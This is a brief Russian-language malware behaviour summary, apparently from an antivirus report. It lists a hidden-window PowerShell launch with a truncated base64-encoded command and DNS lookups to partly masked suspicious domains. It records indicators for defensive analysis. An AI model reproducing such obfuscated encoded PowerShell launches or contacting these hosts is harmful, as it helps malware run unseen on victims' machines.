Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABDAE8ATQBhAGgAagA9ACcARwBlAG4AZQByAGkAYwBfAE0AZQB0AGEAbABfAFMAYQBsAGEAZABpAHYAcgAnADsAJABUAG8AbwB...
- DNS ASK ta#####ntic-dealskp.com
- DNS ASK um####zamzam.com
- DNS ASK wo##########2022-986759.cloudwaysapps.com
- DNS ASK 71##20.com
- DNS ASK vp###haul.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABDAE8ATQBhAGgAagA9ACcARwBlAG4AZQByAGkAYwBfAE0AZQB0AGEAbABfAFMAYQBsAGEAZABpAHYAcgAnADsAJABUAG8AbwB...' (со скрытым окном)